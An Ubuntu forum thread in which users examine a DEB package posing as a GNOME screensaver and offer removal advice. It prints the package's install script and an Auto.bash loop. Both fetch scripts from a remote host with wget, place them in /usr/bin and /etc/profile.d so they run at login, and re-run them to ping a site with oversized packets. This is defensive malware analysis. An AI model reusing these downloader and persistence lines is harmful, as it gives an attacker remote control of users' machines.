[ubuntu] YOU THERE!! Malicios script installed as a DEB, please read!

[conorsulli]

Hello guys Im going to make this breef

I have installed a deb from a site claiming to be an Screensaver however it looked dodgy however I proceeded.

after I looked into the source I found MYSTERIOS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
(also no screensaver was ever shown in gnome-screensaver)

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit


Im no expert but this looks just wrong!!

I have removed the package however I i doubt this has done much good...

Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

This all just litterally happened in the last few minutes and im affraid to reboot my computer.. should I reinstall my gnome packages?

Or was I just being paranoid? Im thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

Sorry for sounding strange, Just trying to fix this A.S.A.P.

Thank you for any suggestions.

[lownox]

Excuse my noobishness, but it appears that the DEB replace those two files and changed the permission level to 777. I would be curious to see the contents of the two files to see what they are trying to do. It does appear you have clicked when you should have clacked though.

[MooPi]

What is the link(url) for this alleged screensaver
Please not as hyper link but plain text.

[doas777]

definitely not a screensaver. I looked at some of the scripts that it downloads and most of them are pretty simplistic, so no idea what it is trying to do, but I;m not seeing it do much. for instance the bash replacement seems to just ping a site "mmowned.com " or some such.

[pbrane]

This is the contents of the Auto.bash script.

Code:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done

you may want to se if run.bash is running. if so kill it. And then remove it from /usr/bin/

gnome.sh runs Auto.bash

Also you can whois mmowned.com and complain to the hosting company. Interesting I just looked up the hosting company and they advertise protection against DOS attacks.

[imbjr]

Quote:

Originally Posted by conorsulli #!/bin/sh cd /usr/bin/ rm Auto.bash sleep 1 wget http://05748.t35.com/Bots/Auto.bash chmod 777 Auto.bash echo ----------------- cd /etc/profile.d/ rm gnome.sh sleep 1 wget http://05748.t35.com/Bots/gnome.sh chmod 777 gnome.sh echo ----------------- clear exit

Ultimately this seems to be happening:
ping -s 65507 www.mmowned.com
which may happen everytime you log in - plus it seems designed to keep what it can run updated.

There's a php file involved too, but I cannot figure out what part that has to play.

I think you may have just been PWNED.

[conorsulli]

OK guys please help me remove from gnome-look this file i have browsed the source codes and it contains something definatley malicious

http://www.gnome-look.org/content/sh...content=116772

please dont install it

im working on contacting others who have installed it and redirecting them here to resolve the issue

[conorsulli]

yes noticed this after further looking...

gonna get this guy good

[Enlightened Shadow]

OMG I installed this earlier today. It hasn't done anything to me yet please tell me how to remove it!

[akashiraffee]

No, you're right. Whatever goes into /etc/profile.d gets run everytime someone logs in. It then downloads another script and runs that. Right now, it is just
ping -s 65507 www.mmowned.com

which could at least be used to collect IP's, if this person is also responsible for mmowned.com. Since this script could be replaced with something else at anytime, it could easily be used to use your computer to assist in a "Denial of Service" attack.

I'm not an expert on stuff like that either, but it certainly is not an innocent thing to do. As you guess, it probably is intended to be forgotten quickly as just "not working".